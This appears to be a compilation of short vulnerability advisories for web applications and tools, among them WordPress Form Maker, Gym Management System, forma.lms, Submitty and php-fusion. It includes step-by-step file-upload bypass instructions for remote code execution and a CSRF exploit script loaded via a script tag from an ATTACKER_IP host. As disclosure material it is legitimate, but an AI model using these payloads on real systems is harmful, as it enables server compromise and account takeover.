SQL injection in the Form Maker by 10Web WordPress Plugin before 5.4.1 exists via the /wordpress/wp-admin/admin.php?page=blocked_ips_fm&s=1" s parameter.
Gym Management System version 1.0 suffers from an unauthenticated file upload vulnerability that allows remote attackers to gain remote code execution (RCE) on the hosting web server by uploading a maliciously crafted PHP file that bypasses the image upload filters. Attackers can access the '/upload.php' page, set the 'id' parameter of the GET request to the desired file name for the uploaded PHP file, bypass the extension whitelist by adding a double extension with the last one being an acceptable extension (png), bypass the file type check by modifying the 'Content-Type' of the 'file' parameter to 'image/png' in the POST request, and set the 'pupload' parameter to 'upload'. In the body of the 'file' parameter of the POST request, the malicious PHP code is inserted; the web application then renames the file to carry the extension that is the second item in its array of acceptable extensions and stores it in the '/upload/' directory. The uploaded file can be accessed via the '/upload/' directory, and the malicious PHP code is executed by passing a command in the 'telepathy' parameter of the GET request.
A vulnerability in Druva inSync Windows Client 6.6.3 allows for local privilege escalation due to a lack of path validation. By appending a directory traversal escape sequence at the end of a valid path, an attacker can bypass the 'strncmp' function and execute arbitrary commands with system privileges.
A denial of service vulnerability exists in Filetto 1.0 that allows an authenticated user to crash the FTP server by sending a specially crafted 'FEAT' command with an overly long string, resulting in a denial of service condition.
When a user creates a thread or edits one of their messages with HTML content, the injected characters are correctly escaped. However, when the print feature is used, the characters are no longer sanitized and can be used to execute JavaScript by replacing the contents of the message with an onerror attribute.
A persistent XSS vulnerability has been detected in Composr CMS that allows arbitrary HTML/script code to be executed in the context of the victim user's browser.
The validation of the CSRF token depends on the request method: when the request method is changed from POST to GET, the backend omits the token validation. To trigger this vulnerability the admin user must be logged in to the system. Set up an HTTP server on the attacker machine, e.g. python -m SimpleHTTPServer 9090. On the attacker machine create a file with this content: var target = document.location.host; var params = "r=lms/profile/show&ap=saveinfo&authentic_request=&up_lastname=&up_firstname=&up_email=hacked@admin.com&user_preference[ui.language]=0&up_signature=&save=Save+changes"; function pwnEmail(){ var xhr = new XMLHttpRequest(); xhr.open("GET", "http://" + target + "/formalms/appLms/index.php?"+params, true); xhr.send(null); } pwnEmail(); Edit a course and put this payload in the description field: <script src="http://ATTACKER_IP:PORT/payload.js"/> The description field is vulnerable to XSS and is used to trigger the CSRF payload. Going to the index page at formalms/appLms/index.php?r=lms/mycourses/show triggers the XSS payload in the description field (the payload loads the payload.js file and executes the CSRF payload). The payload.js file is executed and the admin email is changed.
CraftCMS 3 vCard Plugin 1.0.0 contains a deserialization vulnerability that can be exploited to achieve remote code execution. An attacker can craft a malicious payload and send it to the vulnerable endpoint to execute arbitrary code on the server.
Submitty through 20.04.01 allows XSS via upload of an SVG document, as demonstrated by an attack by a student against a Teaching Fellow. This vulnerability can potentially enable any student to take over the account of a TA who opens the attachment, because the cookie gets exposed. To exploit this vulnerability, a student must log in, go to a gradeable page, and upload a malicious SVG file with any XSS payload. The TA must then open the same page for grading, which triggers the XSS payload.
I've identified an SQL injection vulnerability in php-fusion 9.03.50 that affects the endpoint /php-fusion/administration/comments.php and can be exploited via the ctype param. An attacker can manipulate the SQL statements that are sent to the MySQL database and inject malicious SQL statements. The attacker is able to change the logic of SQL statements executed against the database or extract sensitive information.